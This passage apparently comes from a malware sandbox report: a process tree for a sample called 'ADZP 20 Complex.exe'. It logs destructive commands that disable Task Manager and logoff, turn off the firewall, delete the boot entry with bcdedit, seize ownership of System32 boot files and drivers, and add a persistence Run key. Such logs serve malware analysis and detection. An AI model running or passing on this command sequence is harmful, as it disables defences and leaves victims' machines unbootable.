        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:9196
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8844
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9124
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8732
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9196
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9380
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9524
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9668
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9876
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10104
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9424
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10288
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:10736
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F226.tmp\F227.tmp\F228.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11136
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10936
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10964
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11004
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11064
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:10392
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E1B.tmp\E1C.tmp\E1D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11304
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10420
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11312
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11600
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4688
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6444
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6744
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5040
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2276
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7256
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7680
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:8016
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:8188
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:7484
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:7320
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:6224
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8076
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:7204
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Modifies file permissions
        
        PID:7180
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:956
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2968
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4840
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:1900
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:2244
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F1B3.tmp\F1B4.tmp\F1B5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:2020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:1640
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4796
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:4308
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2164
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:112
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:548
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4532
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        
        PID:3844
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1428
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:3848
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:1464
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2164
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:4780
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:4728
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:4252
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:1212
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5828
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6440
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5460
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:7100
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5836
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5088
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1932
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4896
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2632
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6860
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:3368
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BBE8.tmp\BBE9.tmp\BBEA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:7280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:892
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:4788
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5408
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:3456
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5472
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:5412
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:7684
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7128
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:7136
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:7204
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:6748
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:7820
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:7684
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:7716
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6608
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:9160
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8440
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5148
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9000
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5848
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:2496
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9084
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6896
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5760
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:2296
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9252
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9440
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9768
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CE62.tmp\CE63.tmp\CE64.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:10152
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9988
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6404
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7544
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10380
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:3972
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6A8.tmp\6A9.tmp\6AA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11232
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8608
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11292
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11528
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:496
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2132
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:1212
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6792
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7228
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BEC7.tmp\BEC8.tmp\BEF8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:7496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7072
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:3124
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8064
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:6940
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7152
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:5100
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5552
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2320
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:6232
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5104
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:7676
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:8148
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5116
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:3964
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7152
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5148
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9212
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9108
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:1436
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9264
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9460
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9600
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9760
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9980
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5804
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9612
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10404
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:10864
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\10B.tmp\10C.tmp\10D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:2028
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11168
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:904
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:2688
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11384
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7436
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7564
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7664
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7736
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8088
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D7FC.tmp\D7FD.tmp\D7FE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7240
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:3648
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:4708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:2004
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3456
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5852
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:8016
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3716
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7716
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7980
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:8204
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:8752
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:8980
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:9116
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:8316
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5472
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:2588
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8164
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6804
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6888
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7460
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4376
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7944
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:8096
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3716
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:8160
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:7320
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:7676
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:6308
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:7040
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:8184
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Modifies file permissions
        
        PID:4516
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3128
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:1084
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:3748
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:1404
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:5084
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:488
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3792
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4036
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4336
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4412
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4616
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:2864
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:100
- - C:\Windows\system32\msg.exe
    msg * Has sido hackeado!
    3⤵
    PID:5040
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:4788
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:2100
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Views/modifies file attributes
    PID:7816

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x300
1⤵
PID:4528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:5060

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4532

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4352

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1596

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5644

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5816

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6188

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6584

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6900

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6348

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7344

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7832

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5832

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8400

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8996

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9132

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10480

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3788

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2084

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11412

Network

